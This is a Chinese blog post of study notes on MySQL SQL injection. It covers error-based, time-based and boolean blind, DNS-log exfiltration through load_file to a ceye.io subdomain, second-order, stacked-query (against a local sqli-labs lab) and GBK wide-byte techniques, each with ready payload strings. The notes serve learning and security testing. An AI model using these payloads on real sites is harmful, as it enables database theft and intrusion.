<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="sql注入," />





  <link rel="alternate" href="/atom.xml" title="HoAd-sc" type="application/atom+xml" />






<meta name="description" content="sql注入学习12345678910111213141516171819MySQL 5.0以上和MySQL 5.0以下版本的区别MySQL 5.0以上版本存在一个存储着数据库信息的信息数据库--INFORMATION_SCHEMA，其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。而5.0以下没有。information_schema系">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入学习">
<meta property="og:url" content="http://example.com/2021/04/27/sql%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="HoAd-sc">
<meta property="og:description" content="sql注入学习12345678910111213141516171819MySQL 5.0以上和MySQL 5.0以下版本的区别MySQL 5.0以上版本存在一个存储着数据库信息的信息数据库--INFORMATION_SCHEMA，其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。而5.0以下没有。information_schema系">
<meta property="og:locale">
<meta property="og:image" content="http://example.com/2021/04/27/sql%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/1298490-20171216200508702-1121770116.png">
<meta property="og:image" content="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif">
<meta property="og:image" content="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif">
<meta property="og:image" content="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif">
<meta property="og:image" content="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif">
<meta property="og:image" content="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif">
<meta property="og:image" content="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif">
<meta property="og:image" content="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif">
<meta property="og:image" content="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif">
<meta property="og:image" content="http://www.mozhe.cn/static/ueditor/themes/default/images/spacer.gif">
<meta property="article:published_time" content="2021-04-27T07:56:03.000Z">
<meta property="article:modified_time" content="2021-04-27T07:18:45.915Z">
<meta property="article:author" content="HoAd">
<meta property="article:tag" content="sql注入">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/04/27/sql%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/1298490-20171216200508702-1121770116.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://example.com/2021/04/27/sql注入学习笔记/"/>





  <title>sql注入学习 | HoAd-sc</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">HoAd-sc</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">SUN IS SO DAZZLING!</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />
            
            搜索
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off"
             placeholder="搜索..." spellcheck="false"
             type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/04/27/sql%E6%B3%A8%E5%85%A5%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/tx.jpeg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="HoAd-sc">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">sql注入学习</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-04-27T15:56:03+08:00">
                2021-04-27
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/sql%E6%B3%A8%E5%85%A5/" itemprop="url" rel="index">
                    <span itemprop="name">sql注入</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="sql注入学习"><a href="#sql注入学习" class="headerlink" title="sql注入学习"></a>sql注入学习</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">MySQL 5.0以上和MySQL 5.0以下版本的区别</span><br><span class="line"></span><br><span class="line">MySQL 5.0以上版本存在一个存储着数据库信息的信息数据库--INFORMATION_SCHEMA，其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名，数据库的表，表栏的数据类型与访问权限等。而5.0以下没有。</span><br><span class="line"></span><br><span class="line">information_schema</span><br><span class="line"></span><br><span class="line">系统数据库，记录当前数据库的数据库，表，列，用户权限等信息</span><br><span class="line"></span><br><span class="line">SCHEMATA</span><br><span class="line"></span><br><span class="line">储存mysql所有数据库的基本信息，包括数据库名，编码类型路径等</span><br><span class="line"></span><br><span class="line">TABLES</span><br><span class="line"></span><br><span class="line">储存mysql中的表信息，包括这个表是基本表还是系统表，数据库的引擎是什么，表有多少行，创建时间，最后更新时间等</span><br><span class="line"></span><br><span class="line">COLUMNS</span><br><span class="line"></span><br><span class="line">储存mysql中表的列信息，包括这个表的所有列以及每个列的信息，该列是表中的第几列，列的数据类型，列的编码类型，列的权限，列的注释等</span><br></pre></td></tr></table></figure>





<h2 id="注入方式及原理"><a href="#注入方式及原理" class="headerlink" title="注入方式及原理"></a>注入方式及原理</h2><p>利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。</p>
<p>mysql中%是 通配符</p>
<p>通过增加 【% ，’ ，” , ) , } 】等来进行闭合</p>
<h3 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h3><p>报错注入的函数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">1.floor()</span><br><span class="line"> id &#x3D; 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)</span><br><span class="line"></span><br><span class="line">2.extractvalue()</span><br><span class="line">id&#x3D;&#39;and(select extractvalue(1,concat(&#39;~&#39;,(select database()))))</span><br><span class="line"></span><br><span class="line">3.updatexml()</span><br><span class="line"> id &#x3D; 1 and (updatexml(0x3a,concat(1,(select user())),1))</span><br><span class="line"></span><br><span class="line">4.exp()</span><br><span class="line"> id &#x3D;1 and EXP(~(SELECT * from(select user())a))</span><br><span class="line"></span><br><span class="line">5.以下函数用法基本一样&#123;GeometryCollection(). polygon().multipoint().multilinestring() linestring().multipolygon()</span><br><span class="line"></span><br><span class="line"> id &#x3D; 1 AND GeometryCollection((select * from (select * from(select user())a)b))</span><br><span class="line"> id &#x3D;1 AND polygon((select * from(select * from(select user())a)b))</span><br><span class="line"> id &#x3D; 1 AND multipoint((select * from(select * from(select user())a)b))</span><br><span class="line"> id &#x3D; 1 AND multilinestring((select * from(select * from(select user())a)b))</span><br><span class="line"> id &#x3D; 1 AND LINESTRING((select * from(select * from(select user())a)b))</span><br><span class="line"> id &#x3D;1 AND multipolygon((select * from(select * from(select user())a)b))</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>用处：报错注入在没法用union联合查询时用，但前提还是不能过滤一些关键的函数。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">报错注入就是利用了数据库的某些机制，人为地制造错误条件，使得查询结果能够出现在错误信息中。</span><br></pre></td></tr></table></figure>

<p>在这里的floor(),rand():</p>
<p>rand():生成0~1之间的随机数，可以给定一个随机数的种子，对于每一个给定的种子，rand()函数都会产生一系列可以复现的数字.</p>
<p>floor():对任意正或者负的十进制值向下取整</p>
<p>通常利用这两个函数的方法是<code>floor(rand(0))*2</code> ,其会生成0和1两个数</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">爆数据库名：&#39;union select 1 from (select count(*),concat((select database()),&quot; &quot;,floor(rand(0)*2))x from information_schema.tables group by x)a</span><br><span class="line">爆表名：&#39;union select 1 from (select count(*),concat((select table_name from information_schema.tables where table_schema&#x3D;database() limit 0,1) ,&quot; &quot;,floor(rand(0)*2))x from information_schema.tables group by x)a</span><br><span class="line">爆列名：&#39;union select 1 from (select count(*),concat((select column_name from information_schema.columns where table_name&#x3D;&quot;TABLE_NAME&quot; limit 0,1) ,&quot; &quot;,floor(rand(0)*2))x from information_schema.tables group by x)a</span><br><span class="line">爆数据：&#39;union select 1 from (select count(*),concat((select COLUMN_NAME from TABLE_NAME limit 0,1) ,&quot; &quot;,floor(rand(0)*2))x from information_schema.tables group by x)a</span><br></pre></td></tr></table></figure>

<p><strong>xpath语法错误</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">正常语法：extractvalue(xml_document,Xpath_string);</span><br><span class="line"> 第一个参数：xml_document是string格式，为xml文档对象的名称</span><br><span class="line"> 第二个参数：Xpath_string是xpath格式的字符串</span><br><span class="line"> 作用：从目标xml中返回包含所查询值的字符串</span><br></pre></td></tr></table></figure>

<p>利用xpath语法错误来进行报错注入主要利用<code>extractvalue</code>和<code>updatexml</code>两个函数。<br>使用条件：mysql版本&gt;5.1.5</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pyload：id&#x3D;&#39;and(select extractvalue(&quot;anything&quot;,concat(&#39;~&#39;,(select语句))))</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">查数据库名：id&#x3D;&#39;and(select extractvalue(1,concat(0x7e,(select database()))))</span><br><span class="line"></span><br><span class="line">爆表名：id&#x3D;&#39;and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database()))))</span><br><span class="line"></span><br><span class="line">爆字段名：id&#x3D;&#39;and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name&#x3D;&quot;TABLE_NAME&quot;))))</span><br><span class="line"></span><br><span class="line">爆数据：id&#x3D;&#39;and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">注：0x7e&#x3D;’~’；‘~‘可以换成’#’、’$&#39;等不满足xpath格式的字符</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">正常语法：updatexml(xml_document,xpath_string,new_value)</span><br><span class="line">第一个参数：xml_document是string格式，为xml文档对象的名称 第二个参数：xpath_string是xpath格式的字符串</span><br><span class="line">第三个参数：new_value是string格式，替换查找到的负荷条件的数据 作用：改变文档中符合条件的节点的值</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>第二个参数跟extractvalue函数的第二个参数一样，因此也可以利用，且利用方式相同</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload：id&#x3D;&#39;and(select updatexml(&quot;anything&quot;,concat(&#39;~&#39;,(select语句())),&quot;anything&quot;))</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">爆数据库名：&#39;and(select updatexml(1,concat(0x7e,(select database())),0x7e))</span><br><span class="line">爆表名：&#39;and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema&#x3D;database())),0x7e))</span><br><span class="line">爆列名：&#39;and(select updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name&#x3D;&quot;TABLE_NAME&quot;)),0x7e))</span><br><span class="line">爆数据：&#39;and(select updatexml(1,concat(0x7e,(select group_concat(COLUMN_NAME)from TABLE_NAME)),0x7e))</span><br></pre></td></tr></table></figure>



<h3 id="延时盲注"><a href="#延时盲注" class="headerlink" title="延时盲注"></a>延时盲注</h3><p>sleep():睡眠几秒的一个函数</p>
<p>if（2&gt;1，true，false）。</p>
<p>判断：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39; and sleep(5) %23</span><br></pre></td></tr></table></figure>

<p>利用三元运算符if</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27; and if(length(database())=8,sleep(5),1) %23</span></span><br></pre></td></tr></table></figure>

<p>如果database的长度是8,就延时5秒，否则执行1.</p>
<p>猜库名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39; and if (ascii(substr(database(),1,1))&#x3D;100,sleep(5),1) %23</span><br></pre></td></tr></table></figure>

<p>判断数据库名的第一个是不是ascii码为100的字符。然后写py脚本跑就可以了</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27; and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;106,sleep(5),1) -- +</span></span><br></pre></td></tr></table></figure>

<p>跑表名。</p>
<h3 id="boolen盲注"><a href="#boolen盲注" class="headerlink" title="boolen盲注"></a>boolen盲注</h3><p>在我们输入and 1=1,and1=2，浏览器返回给我们两个不同的页面，而我们就可以根据返回的页面来判断正确的数据信息。</p>
<p>length():返回字符串的长度.</p>
<p>substr():截取字符串。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">substr()&#96;函数有三个参数，用法为：&#96;substr(str,pos,len)</span><br><span class="line">str参数代表待截取的字符串</span><br><span class="line">pos参数代表从什么位置开始截取</span><br><span class="line">len参数表示字符串截取的长度</span><br></pre></td></tr></table></figure>

<p>判断数据库长度以及猜解数据库名。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1&#39; and length((select database()))&#x3D;4</span><br><span class="line">1&#39; and ascii(substr((select database()),1,1))&#x3D;116</span><br></pre></td></tr></table></figure>

<p>猜表名：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#39; and length(select group_concat(table_name) from information_schema.tables where table_schema&#x3D;database())&#x3D;4</span><br></pre></td></tr></table></figure>

<h3 id="dnslog注入"><a href="#dnslog注入" class="headerlink" title="dnslog注入"></a>dnslog注入</h3><p>首先需要有一个可以配置的域名，比如：ceye.io，然后通过代理商设置域名 ceye.io 的 nameserver 为自己的服务器  A，然后再服务器 A 上配置好 DNS Server，这样以来所有 ceye.io 及其子域名的查询都会到 服务器 A  上，这时就能够实时地监控域名查询请求了</p>
<p><img src="1298490-20171216200508702-1121770116.png" alt="1298490-20171216200508702-1121770116"></p>
<p>注入原理</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">域名**DNS**指向的是我们服务器的域名，意味着解析域名时需向**DNS**服务器查询。通过递归查询可以获取数据库上的信息。要记住整个域名内的节点标签被限制在**63**个字符长度大小。</span><br><span class="line">条件：有sql注入点，load_file可以使用。所以一般得是root权限。</span><br></pre></td></tr></table></figure>

<p>注册一个ceye.io的账号，作为dns注入的平台，<a target="_blank" rel="noopener" href="http://ceye.io/">http://ceye.io</a> 这是一个免费的记录dnslog的平台，我们注册后到控制面板会给你一个二级域名：xxx.ceye.io,当我们把注入信息放到三级域名那里，后台的日志会记录下来</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">xxxx.ceye.io是你的个人域名</span><br><span class="line"></span><br><span class="line">Dns注入最后的效果呢就是在xxxx.ceye.io前面显示你注入的结果。例如：</span><br><span class="line"></span><br><span class="line">你得到的数据库是test</span><br><span class="line"></span><br><span class="line">那么效果则是:test.xxxx.ceye.io</span><br></pre></td></tr></table></figure>

<p>网上找的例子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">and if((select load_file(concat(&#39;\\\\&#39;,(select database()),&#39;.HoAd.ceye.io\\abc&#39;))),1,0)</span><br><span class="line"></span><br><span class="line">And 就不多说了，连接前后语句嘛！</span><br><span class="line"></span><br><span class="line">If（1,2,3）这个函数，里面是三个条件，如果1这个位置是true那么执行2位置语句，否则执行3位置语句。</span><br><span class="line"></span><br><span class="line">首先前面的\\\\实际上是两个\其中两个是作为转义符号来的，然后（select database()）是真正的执行语句，然后后面拼接上你的域名，最后面加的\\abc，实例发现，后面不加\\abc或者\\其他字符是无法进行dns注入的，必须加上\\abc或者\\aaa等等都可以，但是记住一定要加。</span><br></pre></td></tr></table></figure>



<h3 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h3><p>二次注入需要具备的两个条件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">（1）用户向数据库插入恶意语句（即使后端代码对语句进行了转义，如mysql_escape_string、mysql_real_escape_string转义）</span><br><span class="line"></span><br><span class="line">（2）数据库对自己存储的数据非常放心，直接取出恶意数据给用户</span><br></pre></td></tr></table></figure>

<p>从数据库取出数据时，查询出的数据，也可能时一个sql恶意语句。</p>
<p>一种场景：</p>
<p>注册时：账号admin’#，密码123456，</p>
<blockquote>
<p>注册用户时：</p>
<p>​     仅对特殊字符进行了转义，判断输入两次密码是否一致，然后将用户键入，将数据插入至数据库。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$sql &#x3D; &quot;insert into users ( username, password) values(\&quot;$username\&quot;, \&quot;$pass\&quot;)&quot;</span><br></pre></td></tr></table></figure>


</blockquote>
<blockquote>
<p>修改密码时：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">$username&#x3D; $_SESSION[&quot;username&quot;];&#x2F;&#x2F;直接取出了数据库的数据</span><br><span class="line"></span><br><span class="line">$sql &#x3D; &quot;UPDATE users SET PASSWORD&#x3D;&#39;$pass&#39; where username&#x3D;&#39;$username&#39; and password&#x3D;&#39;$curr_pass&#39; &quot;;&#x2F;&#x2F;对该用户的密码进行更新</span><br><span class="line"></span><br><span class="line">$sql &#x3D; &quot;UPDATE users SET PASSWORD&#x3D;&#39;12345678&#39; where username&#x3D;&#39;admin‘#</span><br></pre></td></tr></table></figure>
</blockquote>
<h3 id="堆叠查询"><a href="#堆叠查询" class="headerlink" title="堆叠查询"></a>堆叠查询</h3><p>mysql_multi_query() 支持多条sql语句同时执行，就是以;分隔。</p>
<p>就同时执行以上两条命令，所以我们可以增删改查，只要权限够。<br>虽然这个注入姿势很牛逼，但实际遇到很少，其可能受到API或者数据库引擎，又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用，利用mysqli_multi_query()函数就支持多条sql语句同时执行，但实际情况中，如PHP为了防止sql注入机制，往往使用调用数据库的函数是mysqli_ query()函数，其只能执行一条语句，分号后面的内容将不会被执行，所以可以说堆叠注入的使用条件十分有限，一旦能够被使用，将可能对网站造成十分大的威胁。</p>
<p>例如：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">select * <span class="keyword">from</span> users;show databases; </span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">127.0</span>.<span class="number">0.1</span>/sqli-labs/Less-<span class="number">38</span>/?id=<span class="number">1</span><span class="string">&#x27;;insert into users(id,username,password) value (77,&#x27;</span>acca<span class="string">&#x27;,&#x27;</span>bbc<span class="string">&#x27;)--+</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=<span class="number">1</span><span class="string">&#x27;;select if(ord(substring(user(),1,1))=114,sleep(3),1);#</span></span><br></pre></td></tr></table></figure>

<h3 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h3><p>查询参数是被单引号包围的，传入的单引号又被转义符()转义，如在后台数据库中对接受的参数使用addslashes()或其过滤函数</p>
<p> 数据库的编码为GBK</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id &#x3D; -1%DF&#39; union select 1,user(),3,%23</span><br></pre></td></tr></table></figure>

<p>在上述条件下，单引号’被转义为%5c，所以就构成了%df%5c，而在GBK编码方式下，%df%5c是一个繁体字“連”，所以单引号成功逃逸。</p>
<p>cookie注入，base64注入，xff注入等等。</p>
<h2 id="查询方式注入"><a href="#查询方式注入" class="headerlink" title="查询方式注入"></a>查询方式注入</h2><p>有select，delete，insert，update，都可以进行注入。</p>
<h2 id="数据库类型分类"><a href="#数据库类型分类" class="headerlink" title="数据库类型分类"></a>数据库类型分类</h2><p>{access;mysql;mssql;oracle;postsql;sqlite;mongodb}</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">所有和数据库有交互的地方都有可能有注入。</span><br></pre></td></tr></table></figure>

<h3 id="mysql注入"><a href="#mysql注入" class="headerlink" title="mysql注入"></a>mysql注入</h3><h6 id="一些特性函数"><a href="#一些特性函数" class="headerlink" title="一些特性函数"></a>一些特性函数</h6><p>user() 返回MySQL当前登录的用户名和主机名</p>
<p>database() 返回当前数据库名称</p>
<p>@@basedir 返回M有SQL的安装路径</p>
<p>@@datadir 返回MySQL文件的存放路径</p>
<p>@@version 返回MySQL数据库版本</p>
<h6 id="mysql的读取文件函数"><a href="#mysql的读取文件函数" class="headerlink" title="mysql的读取文件函数"></a>mysql的读取文件函数</h6><p>**load_file()**函数读取文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">必须有权限读取并且文件必须完全可读</span><br><span class="line"></span><br><span class="line">有文件的完整路径</span><br><span class="line"></span><br><span class="line">能够使用union查询（sql注入时）</span><br><span class="line"></span><br><span class="line">对Web目录有写权限用户必须有secure_file_priv&#x3D;文件权限</span><br><span class="line"></span><br><span class="line">欲读取文件必须小于max_allowed_packetde的允许值</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">secure_file_prive&#x3D;null     限制mysqld不允许导入 | 导出</span><br><span class="line">secure_file_priv&#x3D;&#x2F;tmp&#x2F;     限制mysql的导入 | 导出 只能发生在&#x2F;tmp&#x2F;目录下</span><br><span class="line">secure_file_priv           不对mysql的导入 | 导出做限制</span><br></pre></td></tr></table></figure>

